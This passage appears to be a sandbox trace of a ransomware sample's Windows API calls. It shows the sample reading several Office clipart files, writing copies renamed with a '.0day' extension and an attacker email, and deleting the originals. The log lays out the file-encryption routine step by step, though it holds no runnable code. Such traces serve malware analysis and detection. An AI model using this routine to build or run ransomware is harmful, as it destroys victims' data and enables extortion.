(lpString1=".jpg", lpString2=".WMF") returned -1 [0273.112] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0273.112] lstrlenW (lpString="DD00448_.WMF") returned 12 [0273.112] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00448_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0273.139] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=2952) returned 1 [0273.139] CloseHandle (hObject=0x2cc) returned 1 [0273.140] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00448_.wmf")) returned 0x20 [0273.166] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00448_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0273.166] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00448_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0273.166] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0273.166] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0273.166] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00448_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0273.167] GetLastError () returned 0x0 [0273.167] ReadFile (in: hFile=0x37c, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0xb88, lpOverlapped=0x0) returned 1 [0273.181] WriteFile (in: hFile=0x390, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xb90, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xb90, lpOverlapped=0x0) returned 1 [0273.182] ReadFile (in: hFile=0x37c, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0273.182] WriteFile (in: hFile=0x390, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.182] SetEndOfFile (hFile=0x390) returned 1 [0273.182] CloseHandle (hObject=0x390) returned 1 [0273.182] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0273.182] SetEndOfFile (hFile=0x37c) returned 1 [0273.185] CloseHandle (hObject=0x37c) returned 1 [0273.185] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0273.185] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00448_.wmf")) returned 1 [0273.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63 [0273.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63 [0273.185] lstrlenW (lpString=".doc") returned 4 [0273.185] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.185] lstrlenW (lpString=".docx") returned 5 [0273.185] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.185] lstrlenW (lpString=".pdf") returned 4 [0273.185] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.185] lstrlenW (lpString=".xls") returned 4 [0273.185] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.185] lstrlenW (lpString=".xlsx") returned 5 [0273.185] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.185] lstrlenW (lpString=".ppt") returned 4 [0273.185] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.185] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63 [0273.185] lstrlenW (lpString=".zip") returned 4 [0273.185] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.186] lstrlenW (lpString=".rar") returned 4 [0273.186] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.186] lstrlenW (lpString=".bz2") returned 4 [0273.186] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.186] lstrlenW (lpString=".7z") returned 3 [0273.186] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63 [0273.186] lstrlenW (lpString=".dbf") returned 4 [0273.186] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63 [0273.587] lstrlenW (lpString=".1cd") returned 4 [0273.587] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63 [0273.587] lstrlenW (lpString=".jpg") returned 4 [0273.587] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63 [0273.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63 [0273.588] lstrlenW (lpString=".doc") returned 4 [0273.588] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.588] lstrlenW (lpString=".docx") returned 5 [0273.588] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.588] lstrlenW (lpString=".pdf") returned 4 [0273.588] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.588] lstrlenW (lpString=".xls") returned 4 [0273.588] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.588] lstrlenW (lpString=".xlsx") returned 5 [0273.588] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.588] lstrlenW (lpString=".ppt") returned 4 [0273.588] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63 [0273.588] lstrlenW (lpString=".zip") returned 4 [0273.588] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.588] lstrlenW (lpString=".rar") returned 4 [0273.588] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.588] lstrlenW (lpString=".bz2") returned 4 [0273.588] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.588] lstrlenW (lpString=".7z") returned 3 [0273.588] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63 [0273.588] lstrlenW (lpString=".dbf") returned 4 [0273.588] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63 [0273.588] lstrlenW (lpString=".1cd") returned 4 [0273.588] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63 [0273.588] lstrlenW (lpString=".jpg") returned 4 [0273.588] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.588] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0273.589] lstrlenW (lpString="DD01140_.WMF") returned 12 [0273.589] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01140_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0273.873] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=3616) returned 1 [0273.874] CloseHandle (hObject=0x2cc) returned 1 [0273.874] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01140_.wmf")) returned 0x20 [0273.960] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01140_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.046] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01140_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0274.046] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.046] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.046] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01140_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0274.046] GetLastError () returned 0x0 [0274.046] ReadFile (in: hFile=0x39c, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0xe20, lpOverlapped=0x0) returned 1 [0274.061] WriteFile (in: hFile=0x384, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xe30, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xe30, lpOverlapped=0x0) returned 1 [0274.062] ReadFile (in: hFile=0x39c, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0274.062] WriteFile (in: hFile=0x384, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.062] SetEndOfFile (hFile=0x384) returned 1 [0274.062] CloseHandle (hObject=0x384) returned 1 [0274.062] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.062] SetEndOfFile (hFile=0x39c) returned 1 [0274.064] CloseHandle (hObject=0x39c) returned 1 [0274.065] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.118] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01140_.wmf")) returned 1 [0274.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63 [0274.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63 [0274.122] lstrlenW (lpString=".doc") returned 4 [0274.122] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.122] lstrlenW (lpString=".docx") returned 5 [0274.122] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.122] lstrlenW (lpString=".pdf") returned 4 [0274.122] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.122] lstrlenW (lpString=".xls") returned 4 [0274.122] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.122] lstrlenW (lpString=".xlsx") returned 5 [0274.122] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.122] lstrlenW (lpString=".ppt") returned 4 [0274.122] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63 [0274.122] lstrlenW (lpString=".zip") returned 4 [0274.122] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.122] lstrlenW (lpString=".rar") returned 4 [0274.122] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.122] lstrlenW (lpString=".bz2") returned 4 [0274.123] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.123] lstrlenW (lpString=".7z") returned 3 [0274.123] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63 [0274.123] lstrlenW (lpString=".dbf") returned 4 [0274.123] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63 [0274.123] lstrlenW (lpString=".1cd") returned 4 [0274.123] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63 [0274.123] lstrlenW (lpString=".jpg") returned 4 [0274.123] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63 [0274.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63 [0274.123] lstrlenW (lpString=".doc") returned 4 [0274.123] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.123] lstrlenW (lpString=".docx") returned 5 [0274.123] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.123] lstrlenW (lpString=".pdf") returned 4 [0274.123] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.123] lstrlenW (lpString=".xls") returned 4 [0274.123] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.123] lstrlenW (lpString=".xlsx") returned 5 [0274.123] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.123] lstrlenW (lpString=".ppt") returned 4 [0274.123] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63 [0274.123] lstrlenW (lpString=".zip") returned 4 [0274.123] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.123] lstrlenW (lpString=".rar") returned 4 [0274.123] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.123] lstrlenW (lpString=".bz2") returned 4 [0274.123] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.123] lstrlenW (lpString=".7z") returned 3 [0274.124] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63 [0274.124] lstrlenW (lpString=".dbf") returned 4 [0274.124] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63 [0274.124] lstrlenW (lpString=".1cd") returned 4 [0274.124] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 63 [0274.124] lstrlenW (lpString=".jpg") returned 4 [0274.124] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.124] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0274.124] lstrlenW (lpString="DD01170_.WMF") returned 12 [0274.124] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01170_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0274.287] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=2404) returned 1 [0274.287] CloseHandle (hObject=0x2c4) returned 1 [0274.288] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01170_.wmf")) returned 0x20 [0274.587] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01170_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.587] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01170_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0274.587] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.587] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.587] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01170_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0274.588] GetLastError () returned 0x0 [0274.588] ReadFile (in: hFile=0x318, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x964, lpOverlapped=0x0) returned 1 [0274.591] WriteFile (in: hFile=0x300, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0x970, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0x970, lpOverlapped=0x0) returned 1 [0274.592] ReadFile (in: hFile=0x318, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0274.592] WriteFile (in: hFile=0x300, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.592] SetEndOfFile (hFile=0x300) returned 1 [0274.592] CloseHandle (hObject=0x300) returned 1 [0274.592] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.592] SetEndOfFile (hFile=0x318) returned 1 [0274.594] CloseHandle (hObject=0x318) returned 1 [0274.594] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.635] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01170_.wmf")) returned 1 [0274.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63 [0274.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63 [0274.635] lstrlenW (lpString=".doc") returned 4 [0274.636] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.636] lstrlenW (lpString=".docx") returned 5 [0274.636] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.636] lstrlenW (lpString=".pdf") returned 4 [0274.636] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.636] lstrlenW (lpString=".xls") returned 4 [0274.636] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.636] lstrlenW (lpString=".xlsx") returned 5 [0274.636] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.636] lstrlenW (lpString=".ppt") returned 4 [0274.636] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.636] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63 [0274.636] lstrlenW (lpString=".zip") returned 4 [0274.636] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.636] lstrlenW (lpString=".rar") returned 4 [0274.636] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.636] lstrlenW (lpString=".bz2") returned 4 [0274.636] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.636] lstrlenW (lpString=".7z") returned 3 [0274.636] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.636] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63 [0274.636] lstrlenW (lpString=".dbf") returned 4 [0274.636] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.636] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63 [0274.636] lstrlenW (lpString=".1cd") returned 4 [0274.636] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.636] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63 [0274.636] lstrlenW (lpString=".jpg") returned 4 [0274.636] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.636] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63 [0274.636] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63 [0274.636] lstrlenW (lpString=".doc") returned 4 [0274.636] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.637] lstrlenW (lpString=".docx") returned 5 [0274.637] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.637] lstrlenW (lpString=".pdf") returned 4 [0274.637] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.637] lstrlenW (lpString=".xls") returned 4 [0274.637] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.637] lstrlenW (lpString=".xlsx") returned 5 [0274.637] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.637] lstrlenW (lpString=".ppt") returned 4 [0274.637] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.637] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63 [0274.637] lstrlenW (lpString=".zip") returned 4 [0274.637] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.637] lstrlenW (lpString=".rar") returned 4 [0274.637] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.637] lstrlenW (lpString=".bz2") returned 4 [0274.637] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.637] lstrlenW (lpString=".7z") returned 3 [0274.637] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.637] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63 [0274.637] lstrlenW (lpString=".dbf") returned 4 [0274.637] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.637] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63 [0274.637] lstrlenW (lpString=".1cd") returned 4 [0274.637] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63 [0274.638] lstrlenW (lpString=".jpg") returned 4 [0274.638] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.638] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0274.638] lstrlenW (lpString="DD01173_.WMF") returned 12 [0274.638] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01173_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0274.703] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=1804) returned 1 [0274.703] CloseHandle (hObject=0x39c) returned 1 [0274.703] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01173_.wmf")) returned 0x20 